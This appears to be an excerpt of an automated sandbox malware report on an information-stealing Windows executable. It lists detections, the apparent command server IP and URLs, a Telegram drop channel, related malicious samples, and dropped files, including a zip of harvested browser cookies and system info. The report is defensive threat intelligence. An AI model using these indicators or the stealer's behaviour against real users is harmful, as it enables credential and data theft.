C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	0%	Metadefender	Browse
C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.8aAG42oIjb.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139893		Download File
0.1.8aAG42oIjb.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://185.138.164.150//l/f/p5H3KXwB3dP17SpzXqG4/9a5837ddcde370a12fac7d7ad748894e8ca04822	0%	Avira URL Cloud	safe
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	0%	URL Reputation	safe
http://fedir.comsign.co.il/crl/ComSignCA.crl0	0%	URL Reputation	safe
http://crl.chambersign.org/chambersroot.crl0	0%	URL Reputation	safe
http://185.138.164.150//l/f/p5H3KXwB3dP17SpzXqG4/9a5837ddcde370a12fac7d7ad748894e8ca048222nR5E	0%	Avira URL Cloud	safe
https://repository.luxtrust.lu0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersroot.html0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://www.chambersign.org1	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://crl.securetrust.com/SGCA.crl0	0%	URL Reputation	safe
http://185.138.164.150/)	0%	Avira URL Cloud	safe
http://crl.securetrust.com/STCA.crl0	0%	URL Reputation	safe
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	0%	URL Reputation	safe
http://www.certplus.com/CRL/class2.crl0	0%	URL Reputation	safe
http://185.138.164.150/w;	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	URL Reputation	safe
http://cps.chambersign.org/cps/chambersignroot.html0	0%	URL Reputation	safe
http://policy.camerfirma.com0	0%	URL Reputation	safe
http://185.138.164.150/L	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
http://ocsp.accv.es0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://185.138.164.150//l/f/p5H3KXwB3dP17SpzXqG4/0082491d8ce92dde3db733700e3efad352687de3	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel	0%	URL Reputation	safe
http://crl.chambersign.org/chambersignroot.crl0	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://185.138.164.150/	0%	Avira URL Cloud	safe
https://www.catcert.net/verarrel05	0%	URL Reputation	safe
http://www.quovadis.bm0	0%	URL Reputation	safe
http://www.accv.es00	0%	URL Reputation	safe
http://www.pkioverheid.nl/policies/root-policy-G20	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.138.164.150//l/f/p5H3KXwB3dP17SpzXqG4/9a5837ddcde370a12fac7d7ad748894e8ca04822	true	Avira URL Cloud: safe	unknown
http://185.138.164.150//l/f/p5H3KXwB3dP17SpzXqG4/0082491d8ce92dde3db733700e3efad352687de3	true	Avira URL Cloud: safe	unknown
http://185.138.164.150/	true	Avira URL Cloud: safe	unknown
https://t.me/agrybirdsgamerept	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	RYwTiizs2t.0.dr	false		high
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	RYwTiizs2t.0.dr	false		high
http://crl.chambersign.org/chambersroot.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://185.138.164.150//l/f/p5H3KXwB3dP17SpzXqG4/9a5837ddcde370a12fac7d7ad748894e8ca048222nR5E	8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://repository.luxtrust.lu0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/answer/6258784	8aAG42oIjb.exe, 00000000.00000003.665151353.0000000002C43000.00000004.00000001.sdmp	false		high
http://cps.chambersign.org/cps/chambersroot.html0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://telegram.org/img/t_logo.png	8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	false		high
http://www.mozilla.com0	8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	false	URL Reputation: safe	unknown
http://www.chambersign.org1	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	8aAG42oIjb.exe, 00000000.00000003.665168634.0000000002C48000.00000004.00000001.sdmp, 8aAG42oIjb.exe, 00000000.00000003.665151353.0000000002C43000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.firmaprofesional.com/cps0	nssckbi.dll.0.dr	false		high
http://www.diginotar.nl/cps/pkioverheid0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://repository.swisssign.com/0	nssckbi.dll.0.dr	false		high
http://crl.securetrust.com/SGCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://185.138.164.150/)	8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.securetrust.com/STCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go	8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	false		high
http://www.certplus.com/CRL/class2.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows	8aAG42oIjb.exe, 00000000.00000003.672455258.0000000002C3F000.00000004.00000001.sdmp	false		high
http://www.quovadisglobal.com/cps0	nssckbi.dll.0.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	8aAG42oIjb.exe, 00000000.00000003.672320146.0000000002CB2000.00000004.00000001.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0	nssckbi.dll.0.dr	false		high
http://185.138.164.150/w;	8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://cps.chambersign.org/cps/chambersignroot.html0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	sqlite3.dll.0.dr	false		high
http://policy.camerfirma.com0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094	8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.0.dr	false		high
http://185.138.164.150/L	8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RYwTiizs2t.0.dr	false		high
http://www.accv.es/legislacion_c.htm0U	nssckbi.dll.0.dr	false		high
http://www.certicamara.com/dpc/0Z	nssckbi.dll.0.dr	false		high
https://go.micro	8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/?gws_rd=ssl	8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	false		high
http://ocsp.accv.es0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://ocsp.thawte.com0	8aAG42oIjb.exe, 00000000.00000003.672359353.0000000002CE2000.00000004.00000001.sdmp, qipcap.dll.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RYwTiizs2t.0.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	RYwTiizs2t.0.dr	false		high
https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?	8aAG42oIjb.exe, 00000000.00000003.672320146.0000000002CB2000.00000004.00000001.sdmp	false		high
https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C	8aAG42oIjb.exe, 00000000.00000003.672320146.0000000002CB2000.00000004.00000001.sdmp	false		high
https://www.google.com/favicon.ico	8aAG42oIjb.exe, 00000000.00000003.672455258.0000000002C3F000.00000004.00000001.sdmp	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g	8aAG42oIjb.exe, 00000000.00000003.672320146.0000000002CB2000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehp	8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	RYwTiizs2t.0.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM	8aAG42oIjb.exe, 00000000.00000003.672343864.0000000002CC4000.00000004.00000001.sdmp	false		high
https://www.catcert.net/verarrel	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://t.me/agryb	8aAG42oIjb.exe, 00000000.00000002.673950420.0000000000755000.00000004.00000001.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	nssckbi.dll.0.dr	false		high
http://crl.chambersign.org/chambersignroot.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
https://www.catcert.net/verarrel05	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.quovadis.bm0	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.accv.es00	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.pkioverheid.nl/policies/root-policy-G20	nssckbi.dll.0.dr	false	URL Reputation: safe	unknown
http://www.cert.fnmt.es/dpcs/0	nssckbi.dll.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RYwTiizs2t.0.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RYwTiizs2t.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.138.164.150	unknown	Germany		50451	DEPTELECOMNSO-ASRU	true
149.154.167.99	t.me	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491912
Start date:	28.09.2021
Start time:	07:13:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	8aAG42oIjb.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/67@1/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 114 Number of non-executed functions: 84
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.203.80.193, 51.124.78.146, 20.82.209.183 Excluded domains from analysis (whitelisted): e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, go.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, store-images.s-microsoft.com-c.edgekey.net, settings-win.data.microsoft.com, arc.trafficmanager.net, arc.msn.com, settingsfd-geo.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:14:04	API Interceptor	5x Sleep call for process: 8aAG42oIjb.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.138.164.150	jUV82t8dgh.exe	Get hash	malicious	Browse	185.138.164.150/
185.138.164.150	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	185.138.164.150/
149.154.167.99	W6qKnnjMEi	Get hash	malicious	Browse	t.me/jhzljkhbsdklzjdlkzj281679827sjah
149.154.167.99	snfstBXgxa	Get hash	malicious	Browse	t.me/cui8txvnmv

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
t.me	Zq0u07ZGkg.exe	Get hash	malicious	Browse	149.154.167.99
	jUV82t8dgh.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	149.154.167.99
	31cGYywxgy.exe	Get hash	malicious	Browse	149.154.167.99
	pAWNholT8X.exe	Get hash	malicious	Browse	149.154.167.99
	OARirszNK2.exe	Get hash	malicious	Browse	149.154.167.99
	rbQe356Ces.exe	Get hash	malicious	Browse	149.154.167.99
	kzSWxYLY4H.exe	Get hash	malicious	Browse	149.154.167.99
	nrR5LZJupm.exe	Get hash	malicious	Browse	149.154.167.99
	Neue Bestellung 09001.exe	Get hash	malicious	Browse	149.154.167.99
	DeKxL6OdiV.exe	Get hash	malicious	Browse	149.154.167.99
	OTKqvzSZfm.exe	Get hash	malicious	Browse	149.154.167.99
	u8NGCuPdOR.exe	Get hash	malicious	Browse	149.154.167.99
	e5jVcbuCo5.exe	Get hash	malicious	Browse	149.154.167.99
	i7qUJCnMz0.exe	Get hash	malicious	Browse	149.154.167.99
	729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe	Get hash	malicious	Browse	149.154.167.99
	iQjdq8GOib.exe	Get hash	malicious	Browse	149.154.167.99
	aRJ7tjHVOF.exe	Get hash	malicious	Browse	149.154.167.99
	4o99bctKos.exe	Get hash	malicious	Browse	149.154.167.99
	zsChlwJrkj.exe	Get hash	malicious	Browse	149.154.167.99

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEGRAMRU	Zq0u07ZGkg.exe	Get hash	malicious	Browse	149.154.167.99
	jUV82t8dgh.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	149.154.167.99
	31cGYywxgy.exe	Get hash	malicious	Browse	149.154.167.99
	pAWNholT8X.exe	Get hash	malicious	Browse	149.154.167.99
	TT09876545678T8R456.exe	Get hash	malicious	Browse	149.154.167.220
	OARirszNK2.exe	Get hash	malicious	Browse	149.154.167.99
	rbQe356Ces.exe	Get hash	malicious	Browse	149.154.167.99
	01_extracted.exe	Get hash	malicious	Browse	149.154.167.220
	kzSWxYLY4H.exe	Get hash	malicious	Browse	149.154.167.99
	Order_0178PDF.exe	Get hash	malicious	Browse	149.154.167.220
	nrR5LZJupm.exe	Get hash	malicious	Browse	149.154.167.99
	Neue Bestellung 09001.exe	Get hash	malicious	Browse	149.154.167.99
	DeKxL6OdiV.exe	Get hash	malicious	Browse	149.154.167.99
	OTKqvzSZfm.exe	Get hash	malicious	Browse	149.154.167.99
	u8NGCuPdOR.exe	Get hash	malicious	Browse	149.154.167.99
	e5jVcbuCo5.exe	Get hash	malicious	Browse	149.154.167.99
	i7qUJCnMz0.exe	Get hash	malicious	Browse	149.154.167.99
	729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe	Get hash	malicious	Browse	149.154.167.99
	iQjdq8GOib.exe	Get hash	malicious	Browse	149.154.167.99
DEPTELECOMNSO-ASRU	Zq0u07ZGkg.exe	Get hash	malicious	Browse	185.138.164.150
	jUV82t8dgh.exe	Get hash	malicious	Browse	185.138.164.150
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	185.138.164.150
	art185.exe	Get hash	malicious	Browse	185.138.164.157
	art185.exe	Get hash	malicious	Browse	185.138.164.157
	R2u2hrX28Z.exe	Get hash	malicious	Browse	185.138.164.60

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	V-21-Kiel-050-D02.docx	Get hash	malicious	Browse	149.154.167.99
	jUV82t8dgh.exe	Get hash	malicious	Browse	149.154.167.99
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse	149.154.167.99
	31cGYywxgy.exe	Get hash	malicious	Browse	149.154.167.99
	pAWNholT8X.exe	Get hash	malicious	Browse	149.154.167.99
	OARirszNK2.exe	Get hash	malicious	Browse	149.154.167.99
	Neue Bestellung 09001.exe	Get hash	malicious	Browse	149.154.167.99
	u8NGCuPdOR.exe	Get hash	malicious	Browse	149.154.167.99
	tNOprA6TKc.exe	Get hash	malicious	Browse	149.154.167.99
	gow3TOp9TW.exe	Get hash	malicious	Browse	149.154.167.99
	TDxZ3sbsqi.exe	Get hash	malicious	Browse	149.154.167.99
	729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe	Get hash	malicious	Browse	149.154.167.99
	iQjdq8GOib.exe	Get hash	malicious	Browse	149.154.167.99
	aRJ7tjHVOF.exe	Get hash	malicious	Browse	149.154.167.99
	4o99bctKos.exe	Get hash	malicious	Browse	149.154.167.99
	gDvlEg3e8p.exe	Get hash	malicious	Browse	149.154.167.99
	oz7Sa3qccH.exe	Get hash	malicious	Browse	149.154.167.99
	1k7pDZj7AD.exe	Get hash	malicious	Browse	149.154.167.99
	ZH2O3APZNp.exe	Get hash	malicious	Browse	149.154.167.99
	ECzur31Emx.exe	Get hash	malicious	Browse	149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\LocalLow\sqlite3.dll	Zq0u07ZGkg.exe	Get hash	malicious	Browse
	jUV82t8dgh.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.14529.exe	Get hash	malicious	Browse
	OARirszNK2.exe	Get hash	malicious	Browse
	rbQe356Ces.exe	Get hash	malicious	Browse
	Neue Bestellung 09001.exe	Get hash	malicious	Browse
	OTKqvzSZfm.exe	Get hash	malicious	Browse
	u8NGCuPdOR.exe	Get hash	malicious	Browse
	e5jVcbuCo5.exe	Get hash	malicious	Browse
	729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe	Get hash	malicious	Browse
	iQjdq8GOib.exe	Get hash	malicious	Browse
	aRJ7tjHVOF.exe	Get hash	malicious	Browse
	4o99bctKos.exe	Get hash	malicious	Browse
	gDvlEg3e8p.exe	Get hash	malicious	Browse
	oz7Sa3qccH.exe	Get hash	malicious	Browse
	1k7pDZj7AD.exe	Get hash	malicious	Browse
	ZH2O3APZNp.exe	Get hash	malicious	Browse
	ECzur31Emx.exe	Get hash	malicious	Browse
	QtTTdCez49.exe	Get hash	malicious	Browse
	NqnaRapjVU.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\01asNgqMltC.zip Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	1197
Entropy (8bit):	7.531130432719906
Encrypted:	false
SSDEEP:	24:9xenbAZXQHmsVsqCm+3gRDAQDq2VoyanoveZ7AzIOFAos:9xenMWHmcs5D3gNJDq2VI57Adq
MD5:	0A4047FF1C65DB53D449F556202F7B86
SHA1:	335F80E85BD9E7A9FD611AE665578BB4927FF5CE
SHA-256:	BFC6513815C9437D26E8930703B4DA4A301457B32F10922928D5C951344C2F96
SHA-512:	178BD80DD2E2ABA0C6E09DA15FD9E83E78A91722B7CAD2C2E827CD023CBC703C8703C5529D465AF4586C27FF4A52593BFBD810B4A22A6D6ACDBE974A3FE3D286
Malicious:	false
Reputation:	low
Preview:	PK.........9<SH.._...........browsers/cookies/Google Chrome_Default.txtUT.....Ra..Ra..Ra%..r.0...5..hCR.a.E.."J}.N....WBu..~}.=..T...<j';~..........4...^.2..y...V...~..h....\|.2 }...9L@J..D=.F...^'......u.............i.%o.J1B...Fr..._.!.%..`....e:....Q;.~....x{.....O.PK.........:<S......Z.......System Info.txtUT...9.Ra9.Ra9.RauS.n.0.=.@.a.6..$.X.....v. ......L.......l.I....z.f.e:.^]].j=Ng.%..F".~..>.U.Cfv.$.....V........S..g.....J...1.....',.....k...(......za4.{.8N{q..{~..`...qz..h..iYk.......t..)....9@.I..<..`-...=..#D[h......^]%w0....D..NZ^k.......0.B..g.Z..-...O.[.Z.t.@...'.'^.3..R..'.....AD.~.S..p[[.m.N....-.....wO}....R.d.(..oM.NZ...Sl...s...IZ./.r....L...uV...Hf.1\|.W.l..KxL7\\'8.J..e....wy.C.bW........t\|......2.c.,f0.@'.=.9.N.G..Rj@.S..1...FO...+...xR.^,..h.........DKsQ..T.T.J..*:-K.I..........R...h.....8.zA.....X...B.p,.p..pn...j..f'.N.B..".0.>...f..B..!.G......[<.\....H......S.2-..p..)GF....ky8.j.P5.w....3....Q.......q

C:\Users\user\AppData\LocalLow\1xVPfvJcrg Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\RYwTiizs2t Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\frAQBc8Wsa Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\rQF69AzBla Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
SSDEEP:	24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Zq0u07ZGkg.exe, Detection: malicious, Browse Filename: jUV82t8dgh.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, Detection: malicious, Browse Filename: OARirszNK2.exe, Detection: malicious, Browse Filename: rbQe356Ces.exe, Detection: malicious, Browse Filename: Neue Bestellung 09001.exe, Detection: malicious, Browse Filename: OTKqvzSZfm.exe, Detection: malicious, Browse Filename: u8NGCuPdOR.exe, Detection: malicious, Browse Filename: e5jVcbuCo5.exe, Detection: malicious, Browse Filename: 729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe, Detection: malicious, Browse Filename: iQjdq8GOib.exe, Detection: malicious, Browse Filename: aRJ7tjHVOF.exe, Detection: malicious, Browse Filename: 4o99bctKos.exe, Detection: malicious, Browse Filename: gDvlEg3e8p.exe, Detection: malicious, Browse Filename: oz7Sa3qccH.exe, Detection: malicious, Browse Filename: 1k7pDZj7AD.exe, Detection: malicious, Browse Filename: ZH2O3APZNp.exe, Detection: malicious, Browse Filename: ECzur31Emx.exe, Detection: malicious, Browse Filename: QtTTdCez49.exe, Detection: malicious, Browse Filename: NqnaRapjVU.exe, Detection: malicious, Browse
